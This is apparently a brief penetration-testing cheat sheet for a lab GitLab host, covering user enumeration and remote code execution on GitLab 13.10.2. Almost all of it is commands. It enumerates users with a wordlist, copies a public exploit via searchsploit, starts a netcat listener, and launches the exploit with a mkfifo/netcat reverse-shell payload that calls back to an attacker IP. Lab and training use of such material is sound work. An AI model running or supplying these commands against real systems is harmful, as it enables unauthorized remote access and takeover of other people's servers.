Gitlab
Footprinting & Discovery
Enumeration
Attacks
RCE on Gitlab 13.10.2
Last updated
Last updated
python3 gitlab_userenum.py --url http://gitlab.inlanefreight.local:8081/ --wordlist names.txt# Copy the exploit
searchsploit -m ruby/webapps/49951.py
# Start a listenner to get the reverse shell
nc -nvlp 9001
#Launch the exploit
python3 gitlab_13_10_2_rce.py -t http://gitlab.inlanefreight.local:8081 -u mrb3n -p password1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 8443 >/tmp/f '